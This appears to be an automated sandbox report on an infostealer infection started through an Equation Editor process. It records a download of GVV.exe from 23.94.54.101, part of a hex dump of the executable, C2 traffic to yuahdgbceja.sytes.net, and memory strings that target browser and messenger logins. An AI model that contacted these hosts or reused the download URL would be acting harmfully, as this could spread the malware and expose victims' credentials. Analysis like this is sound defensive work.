Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 23.94.53.100 2766	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: geoplugin.net
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: yuahdgbceja.sytes.net
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 178.237.33.50 80	Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: yuahdgbceja.sytes.net

Source: global traffic

TCP traffic: 192.168.2.22:49162 -> 23.94.53.100:2766

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Thu, 02 May 2024 19:51:03 GMTAccept-Ranges: bytesETag: "9ff8a010ca9cda1:0"Server: Microsoft-IIS/8.5Date: Sat, 04 May 2024 08:02:37 GMTContent-Length: 1369600Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 00 62 33 66 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 36 0b 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 40 15 00 00 04 00 00 f4 13 15 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 44 7b 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 14 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 44 7b 07 00 00 40 0d 00 00 7c 07 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 c0 14 00 00 76 00 00 00 70 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Source: global traffic	HTTP traffic detected: GET /GVV.exe HTTP/1.1Connection: Keep-AliveHost: 23.94.54.101
Source: global traffic	HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 23.94.54.101 23.94.54.101
Source: Joe Sandbox View	IP Address: 178.237.33.50 178.237.33.50

Source: Joe Sandbox View	ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Source: Joe Sandbox View	ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Source: Joe Sandbox View	ASN Name: ATOM86-ASATOM86NL ATOM86-ASATOM86NL

Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.54.101

Source: C:\Users\user\AppData\Roaming\CKK.exe

Code function: 3_2_00A6CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,

3_2_00A6CE44

Source: C:\Windows\SysWOW64\svchost.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\json[1].json

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /GVV.exe HTTP/1.1Connection: Keep-AliveHost: 23.94.54.101
Source: global traffic	HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: bhvA870.tmp.10.dr	String found in binary or memory: Cookie:user@www.linkedin.com/ equals www.linkedin.com (Linkedin)
Source: svchost.exe, 00000007.00000002.989003730.0000000001E30000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000C.00000002.813543511.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
Source: svchost.exe, 00000007.00000002.989003730.0000000001E30000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000C.00000002.813543511.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
Source: svchost.exe, 0000000A.00000003.816812906.000000000014D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: s://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/loginaultGetItem equals www.facebook.com (Facebook)
Source: svchost.exe, 0000000A.00000003.816812906.000000000014D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: s://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/loginaultGetItem equals www.yahoo.com (Yahoo)
Source: bhvA870.tmp.10.dr	String found in binary or memory: www.linkedin.come equals www.linkedin.com (Linkedin)
Source: svchost.exe, 00000007.00000002.989123562.0000000002C00000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000A.00000002.816888835.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
Source: svchost.exe, 00000007.00000002.989123562.0000000002C00000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000A.00000002.816888835.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)

Source: global traffic	DNS traffic detected: DNS query: yuahdgbceja.sytes.net
Source: global traffic	DNS traffic detected: DNS query: geoplugin.net

Source: EQNEDT32.EXE, 00000002.00000002.458563608.00000000006B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.94.54.101/GVV.exe
Source: EQNEDT32.EXE, 00000002.00000002.458563608.00000000006D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.94.54.101/GVV.exeXC
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://acdn.adnxs.com/ast/ast.js
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://b.scorecardresearch.com/beacon.js
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://cache.btrll.com/default/Pix-1x1.gif
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://cdn.at.atwola.com/_media/uac/msn.html
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://cdn.taboola.com/libtrc/msn-home-network/loader.js
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset
Source: svchost.exe, 00000007.00000002.988954665.00000000005F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp
Source: svchost.exe, 00000007.00000002.988954665.00000000005F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp/
Source: deblaterate.exe, 00000006.00000002.800846202.0000000000720000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.988904668.0000000000400000.00000040.80000000.00040000.00000000.sdmp, deblaterate.exe, 0000000E.00000002.836348083.0000000001070000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.837394121.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp/C
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh
Source: bhvA870.tmp.10.dr	String found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_
